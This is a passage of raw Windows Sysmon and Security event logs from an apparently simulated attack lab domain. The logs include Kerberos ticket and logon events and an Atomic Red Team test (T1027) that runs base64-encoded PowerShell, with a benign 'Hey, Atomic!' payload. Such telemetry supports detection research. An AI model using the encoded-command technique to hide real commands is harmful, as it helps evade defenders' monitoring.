C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.015","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5219,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.015\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.015","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5220,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.015\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.015","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5221,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.015\r\nSourceProcessGUID: {A837DB8D-032A-5F25-0000-001044BF0900}\r\nSourceProcessId: 4892\r\nSourceThreadId: 4592\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-032C-5F25-0000-001019090A00}\r\nTargetProcessId: 3016\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.015","SourceProcessGUID":"{A837DB8D-032A-5F25-0000-001044BF0900}","SourceProcessId":"4892","SourceThreadId":"4592","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-032C-5F25-0000-001019090A00}","TargetProcessId":"3016","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5222,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:44.031\r\nProcessGuid: {A837DB8D-032B-5F25-0000-001080050A00}\r\nProcessId: 4748\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\5yc0l14x\\5yc0l14x.dll\r\nCreationUtcTime: 2020-08-01 05:52:43.953","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:44.031","ProcessGuid":"{A837DB8D-032B-5F25-0000-001080050A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\5yc0l14x\\5yc0l14x.dll","CreationUtcTime":"2020-08-01 05:52:43.953","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220610,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220611,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{F034495C-CC78-1C82-20E4-333C6CD31B9A}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{F034495C-CC78-1C82-20E4-333C6CD31B9A}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220612,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{F034495C-CC78-1C82-20E4-333C6CD31B9A}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{F034495C-CC78-1C82-20E4-333C6CD31B9A}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220613,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x9E61B\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{F034495C-CC78-1C82-20E4-333C6CD31B9A}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x9e61b","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{F034495C-CC78-1C82-20E4-333C6CD31B9A}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220614,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x9E61B\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x9e61b","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5223,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.515\r\nProcessGuid: {A837DB8D-032C-5F25-0000-0010C40A0A00}\r\nProcessId: 4996\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" & {$OriginalCommand = 'Write-Host \\\"\"Hey, Atomic!\\\"\"'\n$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\npowershell.exe -EncodedCommand $EncodedCommand} \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032A-5F25-0000-002094BE0900}\r\nLogonId: 0x9BE94\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {A837DB8D-032B-5F25-0000-0010D8E70900}\r\nParentProcessId: 3064\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 